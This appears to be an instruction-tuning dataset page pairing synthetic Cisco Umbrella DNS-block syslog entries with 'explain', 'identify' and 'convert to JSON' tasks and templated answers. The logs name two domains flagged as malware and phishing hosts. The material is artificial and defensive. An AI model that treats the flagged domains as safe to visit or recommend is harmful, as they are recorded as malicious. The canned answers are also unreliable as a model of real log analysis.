WitFoo-Artifact ::: fqdn=fructed-vulgarizers-mixology.click ::: action=BLOCKED ::: message={"originId":600808038,"originType":"Network Devices","internalIp":"109.110.10.199","externalIp":"197.204.252.202","categories":["Malware"],"tags":[],"destination":"fructed-vulgarizers-mixology.click","originLabel":"alice","actionTaken":"BLOCKED","datetime":"2023-05-25T10:40:30.000Z"} ::: clientIP=109.110.10.199 ::: serverIP=197.204.252.202 ::: userName=alice ::: created_at=2023-05-25T10:40:30.000Z ::: streamName=OpenDNS Detection ::: vendorCode=Malware ::: messageType=firewall_action ::: pipelineName=OpenDNS Detection ::: severityCode=2 ::: startTimeUTC=2023-05-25T10:40:30.000Z ::: serverHostname=fructed-vulgarizers-mixology.click ::: pipelineEntrypoint=dispatch | This is a syslog message from a product called Umbrella by Cisco. The following fields were extracted from the message:
action: block
fqdn: fructed-vulgarizers-mixology.click
messagetype: firewall_action
productids: [38]
senderhost: kafka.precinct
sensitivity: normal
serverhostname: fructed-vulgarizers-mixology.click
severitycode: 2
severitylabel: critical
sourceinfo: unknown
starttimeutc: 2023-05-25T10:40:30.000Z
tags: ['OpenDNS Detection', 'firewall_action']
vendorcode: Malware
streamName: OpenDNS Detection
clientIP: 109.110.10.199
serverIP: 197.204.252.202
userName: alice | Explain this syslog message |
WitFoo-Artifact ::: fqdn=fructed-vulgarizers-mixology.click ::: action=BLOCKED ::: message={"originId":600808038,"originType":"Network Devices","internalIp":"166.106.104.132","externalIp":"251.142.138.134","categories":["Malware"],"tags":[],"destination":"fructed-vulgarizers-mixology.click","originLabel":"bob","actionTaken":"BLOCKED","datetime":"2023-05-25T10:40:30.000Z"} ::: clientIP=166.106.104.132 ::: serverIP=251.142.138.134 ::: userName=bob ::: created_at=2023-05-25T10:40:30.000Z ::: streamName=OpenDNS Detection ::: vendorCode=Malware ::: messageType=firewall_action ::: pipelineName=OpenDNS Detection ::: severityCode=2 ::: startTimeUTC=2023-05-25T10:40:30.000Z ::: serverHostname=fructed-vulgarizers-mixology.click ::: pipelineEntrypoint=dispatch | {
"action": "block",
"fqdn": "fructed-vulgarizers-mixology.click",
"message": "WitFoo-Artifact ::: fqdn=fructed-vulgarizers-mixology.click ::: action=BLOCKED ::: message={\"originId\":600808038,\"originType\":\"Network Devices\",\"internalIp\":\"166.106.104.132\",\"externalIp\":\"251.142.138.134\",\"categories\":[\"Malware\"],\"tags\":[],\"destination\":\"fructed-vulgarizers-mixology.click\",\"originLabel\":\"bob\",\"actionTaken\":\"BLOCKED\",\"datetime\":\"2023-05-25T10:40:30.000Z\"} ::: clientIP=166.106.104.132 ::: serverIP=251.142.138.134 ::: userName=bob ::: created_at=2023-05-25T10:40:30.000Z ::: streamName=OpenDNS Detection ::: vendorCode=Malware ::: messageType=firewall_action ::: pipelineName=OpenDNS Detection ::: severityCode=2 ::: startTimeUTC=2023-05-25T10:40:30.000Z ::: serverHostname=fructed-vulgarizers-mixology.click ::: pipelineEntrypoint=dispatch",
"messagetype": "firewall_action",
"productids": [
38
],
"senderhost": "kafka.precinct",
"sensitivity": "normal",
"serverhostname": "fructed-vulgarizers-mixology.click",
"severitycode": 2,
"severitylabel": "critical",
"sourceinfo": "unknown",
"starttimeutc": "2023-05-25T10:40:30.000Z",
"tags": [
"OpenDNS Detection",
"firewall_action"
],
"vendorcode": "Malware",
"streamName": "OpenDNS Detection",
"clientIP": "166.106.104.132",
"serverIP": "251.142.138.134",
"userName": "bob"
} | Create a JSON artifact from the message |
WitFoo-Artifact ::: fqdn=fructed-vulgarizers-mixology.click ::: action=BLOCKED ::: message={"originId":600808038,"originType":"Network Devices","internalIp":"166.106.104.132","externalIp":"251.142.138.134","categories":["Malware"],"tags":[],"destination":"fructed-vulgarizers-mixology.click","originLabel":"bob","actionTaken":"BLOCKED","datetime":"2023-05-25T10:40:30.000Z"} ::: clientIP=166.106.104.132 ::: serverIP=251.142.138.134 ::: userName=bob ::: created_at=2023-05-25T10:40:30.000Z ::: streamName=OpenDNS Detection ::: vendorCode=Malware ::: messageType=firewall_action ::: pipelineName=OpenDNS Detection ::: severityCode=2 ::: startTimeUTC=2023-05-25T10:40:30.000Z ::: serverHostname=fructed-vulgarizers-mixology.click ::: pipelineEntrypoint=dispatch | Product: Umbrella
Vendor: Cisco | Identify this syslog message |
WitFoo-Artifact ::: fqdn=fructed-vulgarizers-mixology.click ::: action=BLOCKED ::: message={"originId":600808038,"originType":"Network Devices","internalIp":"166.106.104.132","externalIp":"251.142.138.134","categories":["Malware"],"tags":[],"destination":"fructed-vulgarizers-mixology.click","originLabel":"bob","actionTaken":"BLOCKED","datetime":"2023-05-25T10:40:30.000Z"} ::: clientIP=166.106.104.132 ::: serverIP=251.142.138.134 ::: userName=bob ::: created_at=2023-05-25T10:40:30.000Z ::: streamName=OpenDNS Detection ::: vendorCode=Malware ::: messageType=firewall_action ::: pipelineName=OpenDNS Detection ::: severityCode=2 ::: startTimeUTC=2023-05-25T10:40:30.000Z ::: serverHostname=fructed-vulgarizers-mixology.click ::: pipelineEntrypoint=dispatch | This is a syslog message from a product called Umbrella by Cisco. The following fields were extracted from the message:
action: block
fqdn: fructed-vulgarizers-mixology.click
messagetype: firewall_action
productids: [38]
senderhost: kafka.precinct
sensitivity: normal
serverhostname: fructed-vulgarizers-mixology.click
severitycode: 2
severitylabel: critical
sourceinfo: unknown
starttimeutc: 2023-05-25T10:40:30.000Z
tags: ['OpenDNS Detection', 'firewall_action']
vendorcode: Malware
streamName: OpenDNS Detection
clientIP: 166.106.104.132
serverIP: 251.142.138.134
userName: bob | Explain this syslog message |
WitFoo-Artifact ::: fqdn=cambbek.com ::: action=BLOCKED ::: message={"originId":600808038,"originType":"Network Devices","internalIp":"35.140.128.247","externalIp":"24.185.121.195","categories":["Phishing"],"tags":[],"destination":"cambbek.com","originLabel":"charlie","actionTaken":"BLOCKED","datetime":"2023-05-25T18:07:49.000Z"} ::: clientIP=35.140.128.247 ::: serverIP=24.185.121.195 ::: userName=charlie ::: created_at=2023-05-25T18:07:49.000Z ::: streamName=OpenDNS Detection ::: vendorCode=Phishing ::: messageType=firewall_action ::: pipelineName=OpenDNS Detection ::: severityCode=2 ::: startTimeUTC=2023-05-25T18:07:49.000Z ::: serverHostname=cambbek.com ::: pipelineEntrypoint=dispatch | {
"action": "block",
"fqdn": "cambbek.com",
"message": "WitFoo-Artifact ::: fqdn=cambbek.com ::: action=BLOCKED ::: message={\"originId\":600808038,\"originType\":\"Network Devices\",\"internalIp\":\"35.140.128.247\",\"externalIp\":\"24.185.121.195\",\"categories\":[\"Phishing\"],\"tags\":[],\"destination\":\"cambbek.com\",\"originLabel\":\"charlie\",\"actionTaken\":\"BLOCKED\",\"datetime\":\"2023-05-25T18:07:49.000Z\"} ::: clientIP=35.140.128.247 ::: serverIP=24.185.121.195 ::: userName=charlie ::: created_at=2023-05-25T18:07:49.000Z ::: streamName=OpenDNS Detection ::: vendorCode=Phishing ::: messageType=firewall_action ::: pipelineName=OpenDNS Detection ::: severityCode=2 ::: startTimeUTC=2023-05-25T18:07:49.000Z ::: serverHostname=cambbek.com ::: pipelineEntrypoint=dispatch",
"messagetype": "firewall_action",
"productids": [
38
],
"senderhost": "kafka.precinct",
"sensitivity": "normal",
"serverhostname": "cambbek.com",
"severitycode": 2,
"severitylabel": "critical",
"sourceinfo": "unknown",
"starttimeutc": "2023-05-25T18:07:49.000Z",
"tags": [
"OpenDNS Detection",
"firewall_action"
],
"vendorcode": "Phishing",
"streamName": "OpenDNS Detection",
"clientIP": "35.140.128.247",
"serverIP": "24.185.121.195",
"userName": "charlie"
} | Create a JSON artifact from the message |
WitFoo-Artifact ::: fqdn=cambbek.com ::: action=BLOCKED ::: message={"originId":600808038,"originType":"Network Devices","internalIp":"35.140.128.247","externalIp":"24.185.121.195","categories":["Phishing"],"tags":[],"destination":"cambbek.com","originLabel":"charlie","actionTaken":"BLOCKED","datetime":"2023-05-25T18:07:49.000Z"} ::: clientIP=35.140.128.247 ::: serverIP=24.185.121.195 ::: userName=charlie ::: created_at=2023-05-25T18:07:49.000Z ::: streamName=OpenDNS Detection ::: vendorCode=Phishing ::: messageType=firewall_action ::: pipelineName=OpenDNS Detection ::: severityCode=2 ::: startTimeUTC=2023-05-25T18:07:49.000Z ::: serverHostname=cambbek.com ::: pipelineEntrypoint=dispatch | Product: Umbrella
Vendor: Cisco | Identify this syslog message |
WitFoo-Artifact ::: fqdn=cambbek.com ::: action=BLOCKED ::: message={"originId":600808038,"originType":"Network Devices","internalIp":"35.140.128.247","externalIp":"24.185.121.195","categories":["Phishing"],"tags":[],"destination":"cambbek.com","originLabel":"charlie","actionTaken":"BLOCKED","datetime":"2023-05-25T18:07:49.000Z"} ::: clientIP=35.140.128.247 ::: serverIP=24.185.121.195 ::: userName=charlie ::: created_at=2023-05-25T18:07:49.000Z ::: streamName=OpenDNS Detection ::: vendorCode=Phishing ::: messageType=firewall_action ::: pipelineName=OpenDNS Detection ::: severityCode=2 ::: startTimeUTC=2023-05-25T18:07:49.000Z ::: serverHostname=cambbek.com ::: pipelineEntrypoint=dispatch | This is a syslog message from a product called Umbrella by Cisco. The following fields were extracted from the message:
action: block
fqdn: cambbek.com
messagetype: firewall_action
productids: [38]
senderhost: kafka.precinct
sensitivity: normal
serverhostname: cambbek.com
severitycode: 2
severitylabel: critical
sourceinfo: unknown
starttimeutc: 2023-05-25T18:07:49.000Z
tags: ['OpenDNS Detection', 'firewall_action']
vendorcode: Phishing
streamName: OpenDNS Detection
clientIP: 35.140.128.247
serverIP: 24.185.121.195
userName: charlie | Explain this syslog message |
WitFoo-Artifact ::: fqdn=cambbek.com ::: action=BLOCKED ::: message={"originId":600808038,"originType":"Network Devices","internalIp":"159.23.130.85","externalIp":"150.67.189.3","categories":["Phishing"],"tags":[],"destination":"cambbek.com","originLabel":"bob","actionTaken":"BLOCKED","datetime":"2023-05-25T18:07:49.000Z"} ::: clientIP=159.23.130.85 ::: serverIP=150.67.189.3 ::: userName=bob ::: created_at=2023-05-25T18:07:49.000Z ::: streamName=OpenDNS Detection ::: vendorCode=Phishing ::: messageType=firewall_action ::: pipelineName=OpenDNS Detection ::: severityCode=2 ::: startTimeUTC=2023-05-25T18:07:49.000Z ::: serverHostname=cambbek.com ::: pipelineEntrypoint=dispatch | {
"action": "block",
"fqdn": "cambbek.com",
"message": "WitFoo-Artifact ::: fqdn=cambbek.com ::: action=BLOCKED ::: message={\"originId\":600808038,\"originType\":\"Network Devices\",\"internalIp\":\"159.23.130.85\",\"externalIp\":\"150.67.189.3\",\"categories\":[\"Phishing\"],\"tags\":[],\"destination\":\"cambbek.com\",\"originLabel\":\"bob\",\"actionTaken\":\"BLOCKED\",\"datetime\":\"2023-05-25T18:07:49.000Z\"} ::: clientIP=159.23.130.85 ::: serverIP=150.67.189.3 ::: userName=bob ::: created_at=2023-05-25T18:07:49.000Z ::: streamName=OpenDNS Detection ::: vendorCode=Phishing ::: messageType=firewall_action ::: pipelineName=OpenDNS Detection ::: severityCode=2 ::: startTimeUTC=2023-05-25T18:07:49.000Z ::: serverHostname=cambbek.com ::: pipelineEntrypoint=dispatch",
"messagetype": "firewall_action",
"productids": [
38
],
"senderhost": "kafka.precinct",
"sensitivity": "normal",
"serverhostname": "cambbek.com",
"severitycode": 2,
"severitylabel": "critical",
"sourceinfo": "unknown",
"starttimeutc": "2023-05-25T18:07:49.000Z",
"tags": [
"OpenDNS Detection",
"firewall_action"
],
"vendorcode": "Phishing",
"streamName": "OpenDNS Detection",
"clientIP": "159.23.130.85",
"serverIP": "150.67.189.3",
"userName": "bob"
} | Create a JSON artifact from the message |
WitFoo-Artifact ::: fqdn=cambbek.com ::: action=BLOCKED ::: message={"originId":600808038,"originType":"Network Devices","internalIp":"159.23.130.85","externalIp":"150.67.189.3","categories":["Phishing"],"tags":[],"destination":"cambbek.com","originLabel":"bob","actionTaken":"BLOCKED","datetime":"2023-05-25T18:07:49.000Z"} ::: clientIP=159.23.130.85 ::: serverIP=150.67.189.3 ::: userName=bob ::: created_at=2023-05-25T18:07:49.000Z ::: streamName=OpenDNS Detection ::: vendorCode=Phishing ::: messageType=firewall_action ::: pipelineName=OpenDNS Detection ::: severityCode=2 ::: startTimeUTC=2023-05-25T18:07:49.000Z ::: serverHostname=cambbek.com ::: pipelineEntrypoint=dispatch | Product: Umbrella
Vendor: Cisco | Identify this syslog message |
WitFoo-Artifact ::: fqdn=cambbek.com ::: action=BLOCKED ::: message={"originId":600808038,"originType":"Network Devices","internalIp":"159.23.130.85","externalIp":"150.67.189.3","categories":["Phishing"],"tags":[],"destination":"cambbek.com","originLabel":"bob","actionTaken":"BLOCKED","datetime":"2023-05-25T18:07:49.000Z"} ::: clientIP=159.23.130.85 ::: serverIP=150.67.189.3 ::: userName=bob ::: created_at=2023-05-25T18:07:49.000Z ::: streamName=OpenDNS Detection ::: vendorCode=Phishing ::: messageType=firewall_action ::: pipelineName=OpenDNS Detection ::: severityCode=2 ::: startTimeUTC=2023-05-25T18:07:49.000Z ::: serverHostname=cambbek.com ::: pipelineEntrypoint=dispatch | This is a syslog message from a product called Umbrella by Cisco. The following fields were extracted from the message:
action: block
fqdn: cambbek.com
messagetype: firewall_action
productids: [38]
senderhost: kafka.precinct
sensitivity: normal
serverhostname: cambbek.com
severitycode: 2
severitylabel: critical
sourceinfo: unknown
starttimeutc: 2023-05-25T18:07:49.000Z
tags: ['OpenDNS Detection', 'firewall_action']
vendorcode: Phishing
streamName: OpenDNS Detection
clientIP: 159.23.130.85
serverIP: 150.67.189.3
userName: bob | Explain this syslog message |
WitFoo-Artifact ::: fqdn=fructed-vulgarizers-mixology.click ::: action=BLOCKED ::: message={"originId":600808038,"originType":"Network Devices","internalIp":"60.130.22.57","externalIp":"91.165.115.168","categories":["Malware"],"tags":[],"destination":"fructed-vulgarizers-mixology.click","originLabel":"janedoe","actionTaken":"BLOCKED","datetime":"2023-05-25T10:40:30.000Z"} ::: clientIP=60.130.22.57 ::: serverIP=91.165.115.168 ::: userName=janedoe ::: created_at=2023-05-25T10:40:30.000Z ::: streamName=OpenDNS Detection ::: vendorCode=Malware ::: messageType=firewall_action ::: pipelineName=OpenDNS Detection ::: severityCode=2 ::: startTimeUTC=2023-05-25T10:40:30.000Z ::: serverHostname=fructed-vulgarizers-mixology.click ::: pipelineEntrypoint=dispatch | {
"action": "block",
"fqdn": "fructed-vulgarizers-mixology.click",
"message": "WitFoo-Artifact ::: fqdn=fructed-vulgarizers-mixology.click ::: action=BLOCKED ::: message={\"originId\":600808038,\"originType\":\"Network Devices\",\"internalIp\":\"60.130.22.57\",\"externalIp\":\"91.165.115.168\",\"categories\":[\"Malware\"],\"tags\":[],\"destination\":\"fructed-vulgarizers-mixology.click\",\"originLabel\":\"janedoe\",\"actionTaken\":\"BLOCKED\",\"datetime\":\"2023-05-25T10:40:30.000Z\"} ::: clientIP=60.130.22.57 ::: serverIP=91.165.115.168 ::: userName=janedoe ::: created_at=2023-05-25T10:40:30.000Z ::: streamName=OpenDNS Detection ::: vendorCode=Malware ::: messageType=firewall_action ::: pipelineName=OpenDNS Detection ::: severityCode=2 ::: startTimeUTC=2023-05-25T10:40:30.000Z ::: serverHostname=fructed-vulgarizers-mixology.click ::: pipelineEntrypoint=dispatch",
"messagetype": "firewall_action",
"productids": [
38
],
"senderhost": "kafka.precinct",
"sensitivity": "normal",
"serverhostname": "fructed-vulgarizers-mixology.click",
"severitycode": 2,
"severitylabel": "critical",
"sourceinfo": "unknown",
"starttimeutc": "2023-05-25T10:40:30.000Z",
"tags": [
"OpenDNS Detection",
"firewall_action"
],
"vendorcode": "Malware",
"streamName": "OpenDNS Detection",
"clientIP": "60.130.22.57",
"serverIP": "91.165.115.168",
"userName": "janedoe"
} | Create a JSON artifact from the message |
WitFoo-Artifact ::: fqdn=fructed-vulgarizers-mixology.click ::: action=BLOCKED ::: message={"originId":600808038,"originType":"Network Devices","internalIp":"60.130.22.57","externalIp":"91.165.115.168","categories":["Malware"],"tags":[],"destination":"fructed-vulgarizers-mixology.click","originLabel":"janedoe","actionTaken":"BLOCKED","datetime":"2023-05-25T10:40:30.000Z"} ::: clientIP=60.130.22.57 ::: serverIP=91.165.115.168 ::: userName=janedoe ::: created_at=2023-05-25T10:40:30.000Z ::: streamName=OpenDNS Detection ::: vendorCode=Malware ::: messageType=firewall_action ::: pipelineName=OpenDNS Detection ::: severityCode=2 ::: startTimeUTC=2023-05-25T10:40:30.000Z ::: serverHostname=fructed-vulgarizers-mixology.click ::: pipelineEntrypoint=dispatch | Product: Umbrella
Vendor: Cisco | Identify this syslog message |
WitFoo-Artifact ::: fqdn=fructed-vulgarizers-mixology.click ::: action=BLOCKED ::: message={"originId":600808038,"originType":"Network Devices","internalIp":"60.130.22.57","externalIp":"91.165.115.168","categories":["Malware"],"tags":[],"destination":"fructed-vulgarizers-mixology.click","originLabel":"janedoe","actionTaken":"BLOCKED","datetime":"2023-05-25T10:40:30.000Z"} ::: clientIP=60.130.22.57 ::: serverIP=91.165.115.168 ::: userName=janedoe ::: created_at=2023-05-25T10:40:30.000Z ::: streamName=OpenDNS Detection ::: vendorCode=Malware ::: messageType=firewall_action ::: pipelineName=OpenDNS Detection ::: severityCode=2 ::: startTimeUTC=2023-05-25T10:40:30.000Z ::: serverHostname=fructed-vulgarizers-mixology.click ::: pipelineEntrypoint=dispatch | This is a syslog message from a product called Umbrella by Cisco. The following fields were extracted from the message:
action: block
fqdn: fructed-vulgarizers-mixology.click
messagetype: firewall_action
productids: [38]
senderhost: kafka.precinct
sensitivity: normal
serverhostname: fructed-vulgarizers-mixology.click
severitycode: 2
severitylabel: critical
sourceinfo: unknown
starttimeutc: 2023-05-25T10:40:30.000Z
tags: ['OpenDNS Detection', 'firewall_action']
vendorcode: Malware
streamName: OpenDNS Detection
clientIP: 60.130.22.57
serverIP: 91.165.115.168
userName: janedoe | Explain this syslog message |
WitFoo-Artifact ::: fqdn=fructed-vulgarizers-mixology.click ::: action=BLOCKED ::: message={"originId":600808038,"originType":"Network Devices","internalIp":"169.8.192.25","externalIp":"44.58.139.123","categories":["Malware"],"tags":[],"destination":"fructed-vulgarizers-mixology.click","originLabel":"charlie","actionTaken":"BLOCKED","datetime":"2023-05-25T10:40:30.000Z"} ::: clientIP=169.8.192.25 ::: serverIP=44.58.139.123 ::: userName=charlie ::: created_at=2023-05-25T10:40:30.000Z ::: streamName=OpenDNS Detection ::: vendorCode=Malware ::: messageType=firewall_action ::: pipelineName=OpenDNS Detection ::: severityCode=2 ::: startTimeUTC=2023-05-25T10:40:30.000Z ::: serverHostname=fructed-vulgarizers-mixology.click ::: pipelineEntrypoint=dispatch | {
"action": "block",
"fqdn": "fructed-vulgarizers-mixology.click",
"message": "WitFoo-Artifact ::: fqdn=fructed-vulgarizers-mixology.click ::: action=BLOCKED ::: message={\"originId\":600808038,\"originType\":\"Network Devices\",\"internalIp\":\"169.8.192.25\",\"externalIp\":\"44.58.139.123\",\"categories\":[\"Malware\"],\"tags\":[],\"destination\":\"fructed-vulgarizers-mixology.click\",\"originLabel\":\"charlie\",\"actionTaken\":\"BLOCKED\",\"datetime\":\"2023-05-25T10:40:30.000Z\"} ::: clientIP=169.8.192.25 ::: serverIP=44.58.139.123 ::: userName=charlie ::: created_at=2023-05-25T10:40:30.000Z ::: streamName=OpenDNS Detection ::: vendorCode=Malware ::: messageType=firewall_action ::: pipelineName=OpenDNS Detection ::: severityCode=2 ::: startTimeUTC=2023-05-25T10:40:30.000Z ::: serverHostname=fructed-vulgarizers-mixology.click ::: pipelineEntrypoint=dispatch",
"messagetype": "firewall_action",
"productids": [
38
],
"senderhost": "kafka.precinct",
"sensitivity": "normal",
"serverhostname": "fructed-vulgarizers-mixology.click",
"severitycode": 2,
"severitylabel": "critical",
"sourceinfo": "unknown",
"starttimeutc": "2023-05-25T10:40:30.000Z",
"tags": [
"OpenDNS Detection",
"firewall_action"
],
"vendorcode": "Malware",
"streamName": "OpenDNS Detection",
"clientIP": "169.8.192.25",
"serverIP": "44.58.139.123",
"userName": "charlie"
} | Create a JSON artifact from the message |
WitFoo-Artifact ::: fqdn=fructed-vulgarizers-mixology.click ::: action=BLOCKED ::: message={"originId":600808038,"originType":"Network Devices","internalIp":"169.8.192.25","externalIp":"44.58.139.123","categories":["Malware"],"tags":[],"destination":"fructed-vulgarizers-mixology.click","originLabel":"charlie","actionTaken":"BLOCKED","datetime":"2023-05-25T10:40:30.000Z"} ::: clientIP=169.8.192.25 ::: serverIP=44.58.139.123 ::: userName=charlie ::: created_at=2023-05-25T10:40:30.000Z ::: streamName=OpenDNS Detection ::: vendorCode=Malware ::: messageType=firewall_action ::: pipelineName=OpenDNS Detection ::: severityCode=2 ::: startTimeUTC=2023-05-25T10:40:30.000Z ::: serverHostname=fructed-vulgarizers-mixology.click ::: pipelineEntrypoint=dispatch | Product: Umbrella
Vendor: Cisco | Identify this syslog message |
WitFoo-Artifact ::: fqdn=fructed-vulgarizers-mixology.click ::: action=BLOCKED ::: message={"originId":600808038,"originType":"Network Devices","internalIp":"169.8.192.25","externalIp":"44.58.139.123","categories":["Malware"],"tags":[],"destination":"fructed-vulgarizers-mixology.click","originLabel":"charlie","actionTaken":"BLOCKED","datetime":"2023-05-25T10:40:30.000Z"} ::: clientIP=169.8.192.25 ::: serverIP=44.58.139.123 ::: userName=charlie ::: created_at=2023-05-25T10:40:30.000Z ::: streamName=OpenDNS Detection ::: vendorCode=Malware ::: messageType=firewall_action ::: pipelineName=OpenDNS Detection ::: severityCode=2 ::: startTimeUTC=2023-05-25T10:40:30.000Z ::: serverHostname=fructed-vulgarizers-mixology.click ::: pipelineEntrypoint=dispatch | This is a syslog message from a product called Umbrella by Cisco. The following fields were extracted from the message:
action: block
fqdn: fructed-vulgarizers-mixology.click
messagetype: firewall_action
productids: [38]
senderhost: kafka.precinct
sensitivity: normal
serverhostname: fructed-vulgarizers-mixology.click
severitycode: 2
severitylabel: critical
sourceinfo: unknown
starttimeutc: 2023-05-25T10:40:30.000Z
tags: ['OpenDNS Detection', 'firewall_action']
vendorcode: Malware
streamName: OpenDNS Detection
clientIP: 169.8.192.25
serverIP: 44.58.139.123
userName: charlie | Explain this syslog message |
WitFoo-Artifact ::: fqdn=cambbek.com ::: action=BLOCKED ::: message={"originId":600808038,"originType":"Network Devices","internalIp":"45.10.82.240","externalIp":"30.155.12.114","categories":["Phishing"],"tags":[],"destination":"cambbek.com","originLabel":"nighthawk","actionTaken":"BLOCKED","datetime":"2023-05-25T18:07:49.000Z"} ::: clientIP=45.10.82.240 ::: serverIP=30.155.12.114 ::: userName=nighthawk ::: created_at=2023-05-25T18:07:49.000Z ::: streamName=OpenDNS Detection ::: vendorCode=Phishing ::: messageType=firewall_action ::: pipelineName=OpenDNS Detection ::: severityCode=2 ::: startTimeUTC=2023-05-25T18:07:49.000Z ::: serverHostname=cambbek.com ::: pipelineEntrypoint=dispatch | {
"action": "block",
"fqdn": "cambbek.com",
"message": "WitFoo-Artifact ::: fqdn=cambbek.com ::: action=BLOCKED ::: message={\"originId\":600808038,\"originType\":\"Network Devices\",\"internalIp\":\"45.10.82.240\",\"externalIp\":\"30.155.12.114\",\"categories\":[\"Phishing\"],\"tags\":[],\"destination\":\"cambbek.com\",\"originLabel\":\"nighthawk\",\"actionTaken\":\"BLOCKED\",\"datetime\":\"2023-05-25T18:07:49.000Z\"} ::: clientIP=45.10.82.240 ::: serverIP=30.155.12.114 ::: userName=nighthawk ::: created_at=2023-05-25T18:07:49.000Z ::: streamName=OpenDNS Detection ::: vendorCode=Phishing ::: messageType=firewall_action ::: pipelineName=OpenDNS Detection ::: severityCode=2 ::: startTimeUTC=2023-05-25T18:07:49.000Z ::: serverHostname=cambbek.com ::: pipelineEntrypoint=dispatch",
"messagetype": "firewall_action",
"productids": [
38
],
"senderhost": "kafka.precinct",
"sensitivity": "normal",
"serverhostname": "cambbek.com",
"severitycode": 2,
"severitylabel": "critical",
"sourceinfo": "unknown",
"starttimeutc": "2023-05-25T18:07:49.000Z",
"tags": [
"OpenDNS Detection",
"firewall_action"
],
"vendorcode": "Phishing",
"streamName": "OpenDNS Detection",
"clientIP": "45.10.82.240",
"serverIP": "30.155.12.114",
"userName": "nighthawk"
} | Create a JSON artifact from the message |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.